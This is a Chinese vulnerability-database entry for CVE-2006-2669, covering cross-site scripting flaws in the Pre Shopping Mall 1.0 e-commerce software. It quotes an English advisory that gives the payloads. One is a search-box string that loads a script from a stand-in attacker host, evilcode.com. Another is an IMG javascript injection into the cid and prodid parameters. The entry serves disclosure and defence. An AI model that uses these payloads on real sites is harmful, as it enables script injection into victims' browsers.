Pre Shopping Mall 多个跨站脚本攻击(XSS)漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194817 漏洞类型 跨站脚本
发布时间 2006-05-30 更新时间 2006-06-14
CVE编号 CVE-2006-2669 CNNVD-ID CNNVD-200605-535
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050184
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-535
|漏洞详情
PreShoppingMall1.0存在多个跨站脚本攻击(XSS)漏洞。远程攻击者可以借助(1)search.php中的search参数("搜索框"),(2)detail.php中的prodid参数,以及(3)products.php中的cid参数,注入任意Web脚本或HTML。
|漏洞EXP
Pre Shopping Mall

Homepage:

http://www.preprojects.com/emall.asp

Description:

PRE SHOPPING MALL a power full ecommerce shopping mall solution. If you need to setup a online shop or shopping mall PRE SHOPPING MALL is your quickest solution. You can setup your Emall within few hours. Buy install and start selling your products. Very easy to installs and manage powerful administration. Receive payments either through Paypal or Authorize.net. Quickest solution for your online business.

Effected files:

search box.

detail.php

products.php

Exploits & Vulns:

XSS Vulnerabilities:

The search and login  box does not sanatize user input before generating it dynamically. This could cause XSS.

For proof of concept just try putting this in the search box:

'';!--"<XSS>=&{()}'';!--"<XSS>=&{()}<SCRIPT SRC=http://www.evilcode.com/xss.js></SCRIPT>'';!--"<XSS>=&{()}'';!--"

<XSS>=&{()}

More XSS Vulns:

For the XSS examples we'll use url injection with the tag: <IMG%20SRC=javascript:alert('XSS')>

http://www.example.com/emall/products.php?cid=[XSS]

http://www.example.com/emall/detail.php?prodid=[XSS]
|参考资料

来源:VUPEN
名称:ADV-2006-1991
链接:http://www.frsirt.com/english/advisories/2006/1991
来源:SECUNIA
名称:20295
链接:http://secunia.com/advisories/20295
来源:XF
名称:preshoppingmall-multiple-xss(26690)
链接:http://xforce.iss.net/xforce/xfdb/26690
来源:BUGTRAQ
名称:20060524PreShoppingMallv1.0
链接:http://www.securityfocus.com/archive/1/archive/1/435018/100/0/threaded
来源:OSVDB
名称:26082
链接:http://www.osvdb.org/26082
来源:OSVDB
名称:26081
链接:http://www.osvdb.org/26081
来源:OSVDB
名称:26080
链接:http://www.osvdb.org/26080
来源:BID
名称:18706
链接:http://www.securityfocus.com/bid/18706
来源:SREASON
名称:990
链接:http://securityreason.com/securityalert/990